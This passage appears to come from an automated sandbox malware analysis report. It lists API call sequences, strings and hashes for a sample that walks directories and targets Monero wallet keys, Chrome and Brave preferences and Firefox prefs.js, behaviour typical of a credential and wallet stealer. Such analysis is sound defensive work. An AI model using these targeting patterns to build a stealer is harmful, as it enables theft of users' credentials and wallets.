                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C13C67
                  • FindClose.KERNEL32(000000FF), ref: 00C13C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 4b9c5a4ababb79bc54bfa7ec36c18600ddc2a04ed980ba183f78f569d360ee15
                  • Instruction ID: 70ec680fb1b9e4c7b36abaaf5ff987e53bd3f029da81ff9d5b6917a932481af2
                  • Opcode Fuzzy Hash: 4b9c5a4ababb79bc54bfa7ec36c18600ddc2a04ed980ba183f78f569d360ee15
                  • Instruction Fuzzy Hash: CEA194B59402189FDB34DFA4DC85FEE7378BB49300F084598B50DA6181EB709B89DF52
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00C20B32,00C20B2B,00000000,?,?,?,00C213F4,00C20B2A), ref: 00C0BEF5
                  • StrCmpCA.SHLWAPI(?,00C213F8), ref: 00C0BF4D
                  • StrCmpCA.SHLWAPI(?,00C213FC), ref: 00C0BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00C0C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 56c26be0c778271128685b3ff0d009298c0522914b8269a15dd49ad758818d4f
                  • Instruction ID: 993d9df55bd31fcf6ff91a55fdf183f9fc0e0267f99ce86008f2d70564a370f8
                  • Opcode Fuzzy Hash: 56c26be0c778271128685b3ff0d009298c0522914b8269a15dd49ad758818d4f
                  • Instruction Fuzzy Hash: 3A4295729111049BDB14FB70DD96EED733CAF95310F404568F90AA61C1EF30AB8AEB92
                  APIs
                  • wsprintfA.USER32 ref: 00C1492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                  • StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                  • StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                  • FindClose.KERNEL32(000000FF), ref: 00C14B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 292ddaffc37aa4673ff3af3a14ce1f96324f0bab5383b9d38de6111cdefc68e4
                  • Instruction ID: 92ef6ea0e77568f3f7e4f89e048e783de026c7f2f2783e3a4ab14d97e0afd2e1
                  • Opcode Fuzzy Hash: 292ddaffc37aa4673ff3af3a14ce1f96324f0bab5383b9d38de6111cdefc68e4
                  • Instruction Fuzzy Hash: 936176B5940218AFCB24EFE1DC49EEA737CFB49700F044599B509A6181EB309B89DF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C14580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C14587
                  • wsprintfA.USER32 ref: 00C145A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C145BD
                  • StrCmpCA.SHLWAPI(?,00C20FC4), ref: 00C145EB
                  • StrCmpCA.SHLWAPI(?,00C20FC8), ref: 00C14601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C1468B
                  • FindClose.KERNEL32(000000FF), ref: 00C146A0
                  • lstrcat.KERNEL32(?,0179ED58), ref: 00C146C5
                  • lstrcat.KERNEL32(?,0179DC80), ref: 00C146D8
                  • lstrlen.KERNEL32(?), ref: 00C146E5
                  • lstrlen.KERNEL32(?), ref: 00C146F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 843faa6c07443c15d4a38b55cdabe427d7705efe2e3781a555401f1301fb148d
                  • Instruction ID: 158d826994c45bbd299e8ddc0fa1ab536d9a1e2d17d516e02b0f74790b98efd7
                  • Opcode Fuzzy Hash: 843faa6c07443c15d4a38b55cdabe427d7705efe2e3781a555401f1301fb148d
                  • Instruction Fuzzy Hash: 0E5187B69402189FC724EBB0DC89FED737CAB59310F044599F609A6090EB749BC9DF91
                  APIs
                  • wsprintfA.USER32 ref: 00C13EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C13EDA
                  • StrCmpCA.SHLWAPI(?,00C20FAC), ref: 00C13F08
                  • StrCmpCA.SHLWAPI(?,00C20FB0), ref: 00C13F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C1406C
                  • FindClose.KERNEL32(000000FF), ref: 00C14081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 00ea58cd7a0f04609417f5d0238fa878061f1cbc514ccd5c960b768247409be2
                  • Instruction ID: c97d1c705f5c3692caab5fbc978fcce6a0592658b69edb0628610b54ff09b98d
                  • Opcode Fuzzy Hash: 00ea58cd7a0f04609417f5d0238fa878061f1cbc514ccd5c960b768247409be2
                  • Instruction Fuzzy Hash: 1B5199B6900218AFCB24EBB1DC85EFA737CFB49300F044599B61996080DB75DB8ADF91
                  APIs
                  • wsprintfA.USER32 ref: 00C0ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C0ED55
                  • StrCmpCA.SHLWAPI(?,00C21538), ref: 00C0EDAB
                  • StrCmpCA.SHLWAPI(?,00C2153C), ref: 00C0EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00C0F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: 5f10421adf72ec61c6a7f44eb56fb8437146d0937ab71020aaeb7392205926e7
                  • Instruction ID: 2fcc4710b1e3327a06f17addbf87cc7a56930425bc8dbb52a63df05bf3b11df3
                  • Opcode Fuzzy Hash: 5f10421adf72ec61c6a7f44eb56fb8437146d0937ab71020aaeb7392205926e7
                  • Instruction Fuzzy Hash: 7FE1F2719121189AEB54FB60DD52EEE7338AF55310F4041E9B50A620D2EE306FCBEF92
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C215B8,00C20D96), ref: 00C0F71E
                  • StrCmpCA.SHLWAPI(?,00C215BC), ref: 00C0F76F
                  • StrCmpCA.SHLWAPI(?,00C215C0), ref: 00C0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00C0FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 07a962cff4c22c041119ea7605d1430b14da951e8ed0651e70167f3143119819
                  • Instruction ID: acaaf7dd905b518d6f961f45ba78f6a7492dcc6a45bd39695cd29c85b1c48221
                  • Opcode Fuzzy Hash: 07a962cff4c22c041119ea7605d1430b14da951e8ed0651e70167f3143119819
                  • Instruction Fuzzy Hash: 47B174719011189BDB24FF60DD95FEE7379AF55310F0081A8E40A961C1EF30AB8AEF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /M {$?~{$Bw{g$C%z^$C%~Z$S v9$Whs~$d2j?$fv/$u/7}$+uq
                  • API String ID: 0-845356496
                  • Opcode ID: 8aac9f9471af05c8dc300e877ba7c807dfccb68be9c461831dbdb26a0124ecb2
                  • Instruction ID: 470dbbd4e881ec6c713657e24c3ad21bdfaa0da747170a82ccc21f9492cef5dc
                  • Opcode Fuzzy Hash: 8aac9f9471af05c8dc300e877ba7c807dfccb68be9c461831dbdb26a0124ecb2
                  • Instruction Fuzzy Hash: F7B206F390C600AFE304AF29EC8567AFBE5EF94720F1A892DE6C4C7744E63558418697
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C2510C,?,?,?,00C251B4,?,?,00000000,?,00000000), ref: 00C01923
                  • StrCmpCA.SHLWAPI(?,00C2525C), ref: 00C01973
                  • StrCmpCA.SHLWAPI(?,00C25304), ref: 00C01989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C01D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00C01DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C01E20
                  • FindClose.KERNEL32(000000FF), ref: 00C01E32
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 6d8804ceee2ce792dff3cce14b29af9684da01517cc64722c9750e818158e6da
                  • Instruction ID: b8cb26341e8da82b6f70688f9b23004c2d8d64cf9d37590005cbd495299da302
                  • Opcode Fuzzy Hash: 6d8804ceee2ce792dff3cce14b29af9684da01517cc64722c9750e818158e6da
                  • Instruction Fuzzy Hash: 9C124F719111189BDB19FB60DD96EEEB338AF55310F4041A9B50A620D1EF306FCAEFA1
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C20C2E), ref: 00C0DE5E
                  • StrCmpCA.SHLWAPI(?,00C214C8), ref: 00C0DEAE
                  • StrCmpCA.SHLWAPI(?,00C214CC), ref: 00C0DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00C0E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 6e0d98912580bda5878179469707b0ce127b5468639484af9fa5e0de270fd7a5
                  • Instruction ID: 0c9d255c99b49eeb6cb7ec3051bfeb4a36ae9ccc579dc977302ba6f0786e5622
                  • Opcode Fuzzy Hash: 6e0d98912580bda5878179469707b0ce127b5468639484af9fa5e0de270fd7a5
                  • Instruction Fuzzy Hash: F7F19C718251189ADB25FB61DD95EEE7338BF15310F8041E9B41A62091EF306BCAEF62
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C214B0,00C20C2A), ref: 00C0DAEB
                  • StrCmpCA.SHLWAPI(?,00C214B4), ref: 00C0DB33
                  • StrCmpCA.SHLWAPI(?,00C214B8), ref: 00C0DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00C0DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 72a005460576e448cbb5d7662c86eb9164213f4d277f01e266fd7c3bb5cb48fa
                  • Instruction ID: 18911df13f65777e5037347ba94e663af8109d8e5a8fe5bbbfc75846766e3784
                  • Opcode Fuzzy Hash: 72a005460576e448cbb5d7662c86eb9164213f4d277f01e266fd7c3bb5cb48fa
                  • Instruction Fuzzy Hash: 199174729001049BDB14FBB0EC56AED737CAF95310F448668F81A961C1EE349B8DEBD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !ZZ$$}{w$)Jo=$72o~$Mlu$O*$nzO$zgs
                  • API String ID: 0-2320539437
                  • Opcode ID: e81dbaf147290121e5a96d0c1c194fc9218affc1985dde3334fe68bcaac381fc
                  • Instruction ID: 5768cd1e4aaced29d19bd953a951e8e5ce7838c582c7d5e07b28499cd18467b5
                  • Opcode Fuzzy Hash: e81dbaf147290121e5a96d0c1c194fc9218affc1985dde3334fe68bcaac381fc
                  • Instruction Fuzzy Hash: 8BB219F3A082049FE7046E2DEC8577AFBE9EF94320F16493DEAC5C3744EA3558058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: eP$$J>$3wQ$D>$To;z$w'<$w0Z$,ww
                  • API String ID: 0-3841678167
                  • Opcode ID: f3ad8d575c0e963cf46d9849112a20bfa35c7c0677d2b9b50996f964dee1635d
                  • Instruction ID: 78f650e1d44048c3e8bf2e643bc2b5101a5a4aee796b06ef621de033f43efadd
                  • Opcode Fuzzy Hash: f3ad8d575c0e963cf46d9849112a20bfa35c7c0677d2b9b50996f964dee1635d
                  • Instruction Fuzzy Hash: 7CB207F3A0C204AFE7086E2DEC8577ABBE5EF94720F16493DEAC4C3744E93558058696
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00C205AF), ref: 00C17BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C17BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C17C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C17C62
                  • LocalFree.KERNEL32(00000000), ref: 00C17D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 23c8973ceafe100a94383b15e98a44246af88dcaff18504b28ada72247a243e7
                  • Instruction ID: 930cfbb1565b92ddfd68dd6e45b98c612f72f8bb18e46da367e527165394fcc2
                  • Opcode Fuzzy Hash: 23c8973ceafe100a94383b15e98a44246af88dcaff18504b28ada72247a243e7
                  • Instruction Fuzzy Hash: 1F414D71941218ABDB24DB55DC99BEDB374FF49710F204299E00962281DB346FC6EFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3snr$>vz?$C+S~$\V}$_UyW$sz$3
                  • API String ID: 0-161271779
                  • Opcode ID: 546e5b51917b4610e631e5350f837eda4bddf086532fefd96a6af379e2ab013b
                  • Instruction ID: 4e892daed10ac6594e248bb49109ddf011606707ef45e2e47565a1228a1958f6
                  • Opcode Fuzzy Hash: 546e5b51917b4610e631e5350f837eda4bddf086532fefd96a6af379e2ab013b
                  • Instruction Fuzzy Hash: 93B2F7F3A0C204AFD3146E2DEC85A7AFBE9EF94720F16493DEAC4C7744E63558048696
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C20D73), ref: 00C0E4A2
                  • StrCmpCA.SHLWAPI(?,00C214F8), ref: 00C0E4F2
                  • StrCmpCA.SHLWAPI(?,00C214FC), ref: 00C0E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 7d0bf85de9fb334d29a734f78386324fc7a152d45c722610b8e593dafc87a976
                  • Instruction ID: f6efa2248dac95e825c09b433d6d11dfd19ae79217418ce189bf6622e74a910e
                  • Opcode Fuzzy Hash: 7d0bf85de9fb334d29a734f78386324fc7a152d45c722610b8e593dafc87a976
                  • Instruction Fuzzy Hash: 3D1270319111189AEB14FB60DD96EED7338AF55310F4045A9B50AA21D1EF30AFCAFF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
